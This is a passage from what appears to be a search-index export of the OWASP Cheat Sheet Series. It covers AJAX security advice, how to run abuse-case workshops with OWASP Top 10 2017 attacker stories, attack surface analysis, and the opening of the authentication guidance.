Just like the security one, make sure any interesting business rules/logic is duplicated on the server side lest a user bypasses needed logic and does something silly, or worse, costly.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code","title":"Avoid writing serialization code","text":"

This is hard and even a small mistake can cause large security issues. There are already a lot of frameworks to provide this functionality.

Take a look at the JSON page for links.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-dynamically","title":"Avoid building XML or JSON dynamically","text":"

Just like building HTML or SQL you will cause XML injection bugs, so stay away from this or at least use an encoding library or safe JSON or XML library to make attributes and element data safe.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#never-transmit-secrets-to-the-client","title":"Never transmit secrets to the client","text":"

Anything the client knows the user will also know, so keep all that secret stuff on the server please.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-encryption-in-client-side-code","title":"Don't perform encryption in client side code","text":"

Use TLS/SSL and encrypt on the server!

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-security-impacting-logic-on-client-side","title":"Don't perform security impacting logic on client side","text":"

This is the overall one that gets me out of trouble in case I missed something :)

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#server-side","title":"Server Side","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-csrf-protection","title":"Use CSRF Protection","text":"

Take a look at the Cross-Site Request Forgery (CSRF) Prevention cheat sheet.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#protect-against-json-hijacking-for-older-browsers","title":"Protect against JSON Hijacking for Older Browsers","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#review-angularjs-json-hijacking-defense-mechanism","title":"Review AngularJS JSON Hijacking Defense Mechanism","text":"

See the JSON Vulnerability Protection section of the AngularJS documentation.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#always-return-json-with-an-object-on-the-outside","title":"Always return JSON with an Object on the outside","text":"

Always have the outside primitive be an object for JSON strings:

Exploitable:

[{\"object\": \"inside an array\"}]\n

Not exploitable:

{\"object\": \"not inside an array\"}\n

Also not exploitable:

{\"result\": [{\"object\": \"inside an array\"}]}\n
"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code-server-side","title":"Avoid writing serialization code Server Side","text":"

Remember ref vs. value types! Look for an existing library that has been reviewed.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#services-can-be-called-by-users-directly","title":"Services can be called by users directly","text":"

Even though you only expect your AJAX client side code to call those services the users can too.

Make sure you validate inputs and treat them like they are under user control (because they are!).

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-by-hand-use-the-framework","title":"Avoid building XML or JSON by hand, use the framework","text":"

Use the framework and be safe, do it by hand and have security issues.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-json-and-xml-schema-for-webservices","title":"Use JSON And XML Schema for Webservices","text":"

You need to use a third-party library to validate web services.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html","title":"Abuse Case Cheat Sheet","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Often when the security level of an application is mentioned in requirements, the following expressions are met:

These security requirements are too generic, and thus useless for a development team...

In order to build a secure application, from a pragmatic point of view, it is important to identify the attacks which the application must defend against, according to its business and technical context.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#objective","title":"Objective","text":"

The objective of this cheat sheet is to provide an explanation of what an Abuse Case is, why abuse cases are important when considering the security of an application, and finally to provide a proposal for a pragmatic approach to building a list of abuse cases and tracking them for every feature planned for implementation as part of an application. The cheat sheet may be used for this purpose regardless of the project methodology used (waterfall or agile).

Important note about this Cheat Sheet:

The main objective is to provide a pragmatic approach in order to allow a company or a project team\nto start building and handling the list of abuse cases and then customize the elements\nproposed to its context/culture in order to, finally, build its own method.\n\nThis cheat sheet can be seen as a getting-started tutorial.\n
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#context-approach","title":"Context & approach","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#why-clearly-identify-the-attacks","title":"Why clearly identify the attacks","text":"

Clearly identifying the attacks against which the application must defend is essential in order to enable the following steps in a project or sprint:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#notion-of-abuse-case","title":"Notion of Abuse Case","text":"

In order to help build the list of attacks, the notion of Abuse Cases is helpful.

An Abuse Case can be defined as:

A way to use a feature that was not expected by the implementer,\nallowing an attacker to influence the feature or outcome of use of\nthe feature based on the attacker action (or input).\n

Synopsis defines an Abuse Case like this:

Misuse and abuse cases describe how users misuse or exploit the weaknesses\nof controls in software features to attack an application.\n\nThis can lead to tangible business impact when a direct attack against\nbusiness functionalities, which may bring in revenue or provide\npositive user experience, are attacked.\n\nAbuse cases can also be an effective way to drive security requirements\nthat lead to proper protection of these critical business use cases.\n

Synopsis source

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#how-to-define-the-list-of-abuse-cases","title":"How to define the list of Abuse Cases","text":"

There are many different ways to define the list of abuse cases for a feature (that can be mapped to a user story in agile projects).

The project OWASP Open SAMM proposes the following approach in the Stream B of the Security Practice Requirements Driven Testing for the Maturity level 2:

Misuse and abuse cases describe unintended and malicious use scenarios of the application, describing how an attacker could do this. Create misuse and abuse cases to misuse or exploit the weaknesses of controls in software features to attack an application. Use abuse-case models for an application to serve as fuel for identification of concrete security tests that directly or indirectly exploit the abuse scenarios.\n\nAbuse of functionality, sometimes referred to as a \u201cbusiness logic attack\u201d, depends on the design and implementation of application functions and features. An example is using a password reset flow to enumerate accounts. As part of business logic testing, identify the business rules that are important for the application and turn them into experiments to verify whether the application properly enforces the business rule. For example, on a stock trading application, is the attacker allowed to start a trade at the beginning of the day and lock in a price, hold the transaction open until the end of the day, then complete the sale if the stock price has risen or cancel if the price dropped?\n

Open SAMM source: Verification Requirement Driven Testing Stream B

Another way to achieve the building of the list can be the following (more bottom-up and collaboratively oriented):

Make a workshop that includes people with the following profiles:

During this workshop (duration will depend on the size of the feature list, but 4 hours is a good start) all business features that will be part of the project or the sprint will be processed. The output of the workshop will be a list of attacks (abuse cases) for all business features. All abuse cases will have a risk rating that allows for filtering and prioritization.

It is important to take into account Technical and Business kind of abuse cases and mark them accordingly.

Example:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#when-to-define-the-list-of-abuse-cases","title":"When to define the list of Abuse Cases","text":"

In agile projects, the definition workshop must be made after the meeting in which User Stories are included in a Sprint.

In waterfall projects, the definition workshop must be made when the business features to implement are identified and known by the business.

Whatever the mode of project used (agile or waterfall), the abuse cases selected to be addressed must become security requirements in each feature specification section (waterfall) or User Story acceptance criteria (agile) in order to allow additional cost/effort evaluation, identification and implementation of the countermeasures.

Each abuse case must have a unique identifier in order to allow tracking throughout the whole project/sprint (details about this point will be given in the proposal section).

An example of unique ID format can be ABUSE_CASE_001.

The following figure provides an overview of the chaining of the different steps involved (from left to right):

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#proposal","title":"Proposal","text":"

The proposal will focus on the output of the workshop explained in the previous section.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-1-preparation-of-the-workshop","title":"Step 1: Preparation of the workshop","text":"

First, even if it seems obvious, the key business people must be sure to know, understand and be able to explain the business features that will be processed during the workshop.

Secondly, create a new Microsoft Excel file (you can also use Google Sheets or any other similar software) with the following sheets (or tabs):

This is the representation of each sheet along with an example of content that will be filled during the workshop:

FEATURES sheet:

Feature unique ID Feature name Feature short description FEATURE_001 DocumentUploadFeature Allow user to upload document along a message

COUNTERMEASURES sheet:

Countermeasure unique ID Countermeasure short description Countermeasure help/hint DEFENSE_001 Validate the uploaded file by loading it into a parser Use advice from the OWASP Cheat Sheet about file upload

ABUSE CASES sheet:

Abuse case unique ID Feature ID impacted Abuse case's attack description Attack referential ID (if applicable) CVSS V3 risk rating (score) CVSS V3 string Kind of abuse case Countermeasure ID applicable Handling decision (To Address or Risk Accepted) ABUSE_CASE_001 FEATURE_001 Upload Office file with malicious macro in charge of dropping a malware CAPEC-17 HIGH (7.7) CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:H Technical DEFENSE_001 To Address"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-2-during-the-workshop","title":"Step 2: During the workshop","text":"

Use the spreadsheet to review all the features.

For each feature, follow this flow:

  1. Key business people explain the current feature from a business point of view.
  2. Penetration testers propose and explain a set of attacks that they can perform against the feature.
  3. For each attack proposed:

    1. Appsec proposes a countermeasure and a preferred set up location (infrastructure, network, code, design...).
    2. Technical people give feedback about the feasibility of the proposed countermeasure.
    3. Penetration testers use the CVSS v3 (or other standard) calculator to determine a risk rating. (ex: CVSS V3 calculator)
    4. Risk key people accept/increase/decrease the rating to have final one that match the real business impact for the company.
  4. Business, Risk and Technical key peoples find a consensus and filter the list of abuses for the current feature to keep the ones that must be addressed, and then flag them accordingly in the ABUSE CASES sheet (if risk is accepted then add a comment to explain why).

  5. Pass to next feature...

If the presence of penetration testers is not possible then you can use the following references to identify the applicable attacks on your features:

Important note on attacks and countermeasure knowledge base(s):

With the time and across projects, you will obtain your own dictionary of attacks and countermeasures\nthat are applicable to the kind of application in your business domain.\n\nThis dictionary will speed up the future workshops in a significant way.\n\nTo promote the creation of this dictionary, you can, at the end of the project/sprint, gather the list\nof attacks and countermeasures identified in a central location (wiki, database, file...) that will be\nused during the next workshop in combination with input from penetration pesters.\n
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-3-after-the-workshop","title":"Step 3: After the workshop","text":"

The spreadsheet contains (at this stage) the list of all abuse cases that must be handled and, potentially (depending on the capacity) corresponding countermeasures.

Now, there are two remaining task:

  1. Key business people must update the specification of each feature (waterfall) or the User Story of each feature (agile) to include the associated abuse cases as Security Requirements (waterfall) or Acceptance Criteria (agile).
  2. Key technical people must evaluate the overhead in terms of charge/effort to take into account the countermeasure.
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-4-during-implementation-abuse-cases-handling-tracking","title":"Step 4: During implementation - Abuse cases handling tracking","text":"

In order to track the handling of all the abuse cases, the following approach can be used:

If one or several abuse cases are handled at:

Using this way, it becomes possible (via some minor scripting) to identify where abuse cases are addressed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-5-during-implementation-abuse-cases-handling-validation","title":"Step 5: During implementation - Abuse cases handling validation","text":"

As abuse cases are defined, it is possible to put in place automated or manual validations to ensure that:

Validations can be of the following kinds:

Adding automated tests also allow teams to track that countermeasures against the abuse cases are still effective/in place during a maintenance or bug fixing phase of a project (to prevent accidental removal/disabling). It is also useful when a Continuous Delivery approach is used, to ensure that all abuse cases protections are in place before opening access to the application.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#example-of-derivation-of-abuse-cases-as-user-stories","title":"Example of derivation of Abuse Cases as User Stories","text":"

The following section show an example of derivation of Abuse Cases as User Stories, here using the OWASP TOP 10 as input source.

Threat Oriented Personas:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a12017-injection","title":"A1:2017-Injection","text":"

Epic:

Almost any source of data can be an injection vector, environment variables, parameters, external and internal web services, and all types of users. Injection flaws occur when an attacker can send hostile data to an interpreter.

Abuse Case:

As an attacker, I will perform an injection attack (SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries) against input fields of the User or API interfaces

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a22017-broken-authentication","title":"A2:2017-Broken Authentication","text":"

Epic:

Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. Session management attacks are well understood, particularly in relation to unexpired session tokens.

Abuse Case:

As an attacker, I have access to hundreds of millions of valid username and password combinations for credential stuffing.

Abuse Case:

As an attacker, I have default administrative account lists, automated brute force, and dictionary attack tools I use against login areas of the application and support systems.

Abuse Case:

As an attacker, I manipulate session tokens using expired and fake tokens to gain access.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a32017-sensitive-data-exposure","title":"A3:2017-Sensitive Data Exposure","text":"

Epic:

Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user's client, e.g. browser. A manual attack is generally required. Previously retrieved password databases could be brute forced by Graphics Processing Units (GPUs).

Abuse Case:

As an attacker, I steal keys that were exposed in the application to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I execute man-in-the-middle attacks to get access to traffic and leverage it to obtain sensitive data and possibly get unauthorized access to the application.

Abuse Case:

As an attacker, I steal clear text data off the server, while in transit, or from the user's client, e.g. browser to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I find and target old or weak cryptographic algorithms by capturing traffic and breaking the encryption.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a42017-xml-external-entities-xxe","title":"A4:2017-XML External Entities (XXE)","text":"

Epic:

Attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations.

Abuse Case:

As an attacker, I exploit vulnerable areas of the application where the user or system can upload XML to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

As an attacker, I include hostile content in an XML document which is uploaded to the application or system to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

As an attacker, I include malicious XML code to exploit vulnerable code, dependencies or integrations to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack (e.g. Billion Laughs attack), as well as execute other attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a52017-broken-access-control","title":"A5:2017-Broken Access Control","text":"

Epic:

Exploitation of access control is a core skill of attackers. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.

Abuse Case:

As an attacker, I bypass access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool.

Abuse Case:

As an attacker, I manipulate the primary key and change it to access another's users record, allowing viewing or editing someone else's account.

Abuse Case:

As an attacker, I manipulate sessions, access tokens, or other access controls in the application to act as a user without being logged in, or acting as an admin/privileged user when logged in as a user.

Abuse Case:

As an attacker, I leverage metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token or a cookie or hidden field manipulated to elevate privileges or abusing JWT invalidation.

Abuse Case:

As an attacker, I exploit Cross-Origin Resource Sharing CORS misconfiguration allowing unauthorized API access.

Abuse Case:

As an attacker, I force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user.

Abuse Case:

As an attacker, I access APIs with missing access controls for POST, PUT and DELETE.

Abuse Case:

As an attacker, I target default crypto keys in use, weak crypto keys generated or re-used, or keys where rotation missing is missing.

Abuse Case:

As an attacker, I find areas where the user agent (e.g. app, mail client) does not verify if the received server certificate is valid and perform attacks where I get unauthorized access to data.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a62017-security-misconfiguration","title":"A6:2017-Security Misconfiguration","text":"

Epic:

Attackers will often attempt to exploit unpatched flaws or access default accounts, unused pages, unprotected files and directories, etc to gain unauthorized access or knowledge of the system.

Abuse Case:

As an attacker, I find and exploit missing appropriate security hardening configurations on any part of the application stack, or improperly configured permissions on cloud services.

Abuse Case:

As an attacker, I find unnecessary features which are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges) and attack or exploit the weakness.

Abuse Case:

As an attacker, I use default accounts and their passwords to access systems, interfaces, or perform actions on components which I should not be able to.

Abuse Case:

As an attacker, I find areas of the application where error handling reveals stack traces or other overly informative error messages I can use for further exploitation.

Abuse Case:

As an attacker, I find areas where upgraded systems, latest security features are disabled or not configured securely.

Abuse Case:

As an attacker, I find security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values.

Abuse Case:

As an attacker, I find the server does not send security headers or directives or they are not set to secure values.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a72017-cross-site-scripting-xss","title":"A7:2017-Cross-Site Scripting (XSS)","text":"

Epic:

XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.

Abuse Case:

As an attacker, I perform reflected XSS where the application or API includes unvalidated and unescaped user input as part of HTML output. My successful attack can allow the attacker to execution of arbitrary HTML and JavaScript in my victim's browser. Typically the victim will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.

Abuse Case:

As an attacker, I perform stored XSS where the application or API stores unsanitized user input that is viewed at a later time by another user or an administrator.

Abuse Case:

As an attacker, I perform DOM XSS where JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page is vulnerable to DOM XSS.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a82017-insecure-deserialization","title":"A8:2017-Insecure Deserialization","text":"

Epic:

Exploitation of deserialization is somewhat difficult, as off-the-shelf exploits rarely work without changes or tweaks to the underlying exploit code.

Abuse Case:

As an attacker, I find areas of the application and APIs where deserialization of hostile or tampered objects can be supplied. As a result, I can focus on an object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization. Or I focus on data tampering attacks such as access-control-related attacks where existing data structures are used but the content is changed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a92017-using-components-with-known-vulnerabilities","title":"A9:2017-Using Components with Known Vulnerabilities","text":"

Epic:

While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.

Abuse Case:

As an attacker, I find common open source or closed source packages with weaknesses and perform attacks against vulnerabilities and exploits which are disclosed

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a102017-insufficient-logging-monitoring","title":"A10:2017-Insufficient Logging & Monitoring","text":"

Epic:

Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident. Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected. In 2016, identifying a breach took an average of 191 days so plenty of time for damage to be inflicted.

Abuse Case:

As an attacker, I attack an organization and the logs, monitoring systems, and teams do not see or respond to my attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#sources-of-the-schemas","title":"Sources of the schemas","text":"

All figures were created using https://www.draw.io/ site and exported (as PNG image) for integration into this article.

All XML descriptor files for each schema are available below (using XML description, modification of the schema is possible using DRAW.IO site):

Schemas descriptors archive

"},{"location":"cheatsheets/Access_Control_Cheat_Sheet.html","title":"DEPRECATED: Access Control Cheatsheet","text":"

The Access Control cheeetsheet has been deprecated.

Please visit the Authorization Cheatsheet instead.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html","title":"Attack Surface Analysis Cheat Sheet","text":""},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#what-is-attack-surface-analysis-and-why-is-it-important","title":"What is Attack Surface Analysis and Why is it Important","text":"

This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (e.g. malware injection, social engineering attacks), and there is less focus on insider threats, although the principles remain the same. The internal attack surface is likely to be different to the external attack surface and some users may have a lot of access.

Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.

Attack Surface Analysis is usually done by security architects and pen testers. But developers should understand and monitor the Attack Surface as they design and build and change a system.

Attack Surface Analysis helps you to:

  1. identify what functions and what parts of the system you need to review/test for security vulnerabilities
  2. identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend
  3. identify when you have changed the attack surface and need to do some kind of threat assessment
"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#defining-the-attack-surface-of-an-application","title":"Defining the Attack Surface of an Application","text":"

The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.

The Attack Surface of an application is:

  1. the sum of all paths for data/commands into and out of the application, and
  2. the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding)
  3. all valuable data used in the application, including secrets and keys, intellectual property, critical business data, personal data and PII, and
  4. the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).

You overlay this model with the different types of users - roles, privilege levels - that can access the system (whether authorized or not). Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users (e.g. database administrators, system administrators).

Group each type of attack point into buckets based on risk (external-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.

With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#microservice-and-cloud-native-applications","title":"Microservice and Cloud Native Applications","text":"

Microservice and Cloud Native applications are comprised of multiple smaller components, loosely coupled using APIs and independently scalable. When assessing the attack surface for applications of this architectural style, you should prioritize the components that are reachable from an attack source (e.g. external traffic from the Internet). Such components may be located behind tiers of proxies, load balancers and ingress controllers, and may auto-scale without warning.

Open source tooling such as Scope or ThreatMapper assist in visualizing the attack surface.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#identifying-and-mapping-the-attack-surface","title":"Identifying and Mapping the Attack Surface","text":"

You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:

The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:

You also need to identify the valuable data (e.g. confidential, sensitive, regulated) in the application, by interviewing developers and users of the system, and again by reviewing the source code.

You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like the OWASP ZAP or Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. Some web application firewalls (WAFs) may also be able to export a model of the application's entry points.

Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: signing up and creating a user profile, logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and Application Threat Modeling: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.

The Attack Surface model may be rough and incomplete to start, especially if you haven't done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#measuring-and-assessing-the-attack-surface","title":"Measuring and Assessing the Attack Surface","text":"

Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points \u2013 interfaces with outside systems and to the Internet \u2013 and especially where the system allows anonymous, public access.

These are often where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls, and intrusion detection or prevention systems to help protect your application.

Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the Relative Attack Surface Quotient (RSQ). Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an Attack Surface Metric for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.

Note that deploying multiple versions of an application, leaving features in that are no longer used just in case they may be needed in the future, or leaving old backup copies and unused code increases the Attack Surface. Source code control and robust change management/configurations practices should be used to ensure the actual deployed Attack Surface matches the theoretical one as closely as possible.

Backups of code and data - online, and on offline media - are an important but often ignored part of a system's Attack Surface. Protecting your data and IP by writing secure software and hardening the infrastructure will all be wasted if you hand everything over to bad actors by not protecting your backups.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#managing-the-attack-surface","title":"Managing the Attack Surface","text":"

Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:

The first web page that you create opens up the system's Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven't increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.

If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place.

Changes to session management, authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Similarly for changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture \u2013 swapping out your web server or database platform, or changing the runtime operating system.

As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model, you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.

This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.

Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF) and real-time application-specific attack detection.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html","title":"Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authentication is the process of verifying that an individual, entity or website is whom it claims to be. Authentication in the context of web applications is commonly performed by submitting a username or ID and one or more items of private information that only a given user should know.

Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forth between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict. The Session Management Cheat Sheet contains further guidance on the best practices in this area.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-general-guidelines","title":"Authentication General Guidelines","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#user-ids","title":"User IDs","text":"

Make sure your usernames/user IDs are case-insensitive. User 'smith' and user 'Smith' should be the same user. Usernames should also be unique. For high-security applications, usernames could be assigned and secret instead of user-defined public data.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#email-address-as-a-user-id","title":"Email address as a User ID","text":"

For information on validating email addresses, please visit the input validation cheatsheet email discussion.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-solution-and-sensitive-accounts","title":"Authentication Solution and Sensitive Accounts","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-proper-password-strength-controls","title":"Implement Proper Password Strength Controls","text":"

A key concern when using passwords for authentication is password strength. A \"strong\" password policy makes it difficult or even improbable for one to guess the password through either manual or automated means. The following characteristics define a strong password:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#for-more-detailed-information-check","title":"For more detailed information check","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-secure-password-recovery-mechanism","title":"Implement Secure Password Recovery Mechanism","text":"

It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Please see Forgot Password Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#store-passwords-in-a-secure-fashion","title":"Store Passwords in a Secure Fashion","text":"

It is critical for an application to store a password using the right cryptographic technique. Please see Password Storage Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#compare-password-hashes-using-safe-functions","title":"Compare Password Hashes Using Safe Functions","text":"

Where possible, the user-supplied password should be compared to the stored password hash using a secure password comparison function provided by the language or framework, such as the password_verify() function in PHP. Where this is not possible, ensure that the comparison function:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#change-password-feature","title":"Change Password Feature","text":"

When developing change password feature, ensure to have:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#transmit-passwords-only-over-tls-or-other-strong-transport","title":"Transmit Passwords Only Over TLS or Other Strong Transport","text":"

See: Transport Layer Protection Cheat Sheet

The login page and all subsequent authenticated pages must be exclusively accessed over TLS or other strong transport. Failure to utilize TLS or other strong transport for the login page allows an attacker to modify the login form action, causing the user's credentials to be posted to an arbitrary location. Failure to utilize TLS or other strong transport for authenticated pages after login enables an attacker to view the unencrypted session ID and compromise the user's authenticated session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#require-re-authentication-for-sensitive-features","title":"Require Re-authentication for Sensitive Features","text":"

